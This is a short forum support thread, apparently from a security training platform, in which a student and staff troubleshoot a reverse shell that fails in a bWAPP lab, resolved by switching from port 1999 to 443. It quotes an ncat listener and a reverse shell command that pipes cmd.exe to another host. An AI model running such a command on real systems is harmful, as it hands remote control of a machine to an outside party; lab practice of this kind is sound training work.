Hey @Jeff-Braasch ,
Sorry to hear about your lab issues. Can you tell me which lab you're working on so I can take a look?
Thanks,

Using the ncat -lvp 1999 when using the ncat 192.168.0.5 1999 -e cmd.exe command in Bwapp cannot establish reverse shell. -
Thanks for the info @Jeff-Braasch
It would seem that you have definitely found a glitch. I've spent the last half-hour working this lab myself to test and troubleshoot the issue.
I will open a support ticket and let you know as soon as this is resolved.
Thanks for informing us!

Well Dan, I was trying to help the help-desk, they are confused and have no idea of who you are, LoL.
I found the problem, looks like port 1999 is closed. I used port 443 and it worked. They are continuing to test it because as of now the instructions are incorrect. -
@Jeff-Braasch.
The solution you mentioned was the right one that was also determined by our Lab Technical Specialist and implemented. -
Glad you got it figured out @Jeff-Braasch
I also tried other ports, including 443 and it did not work for me. But looks like everything is resolved now either way. Thanks for letting us know about the issue!
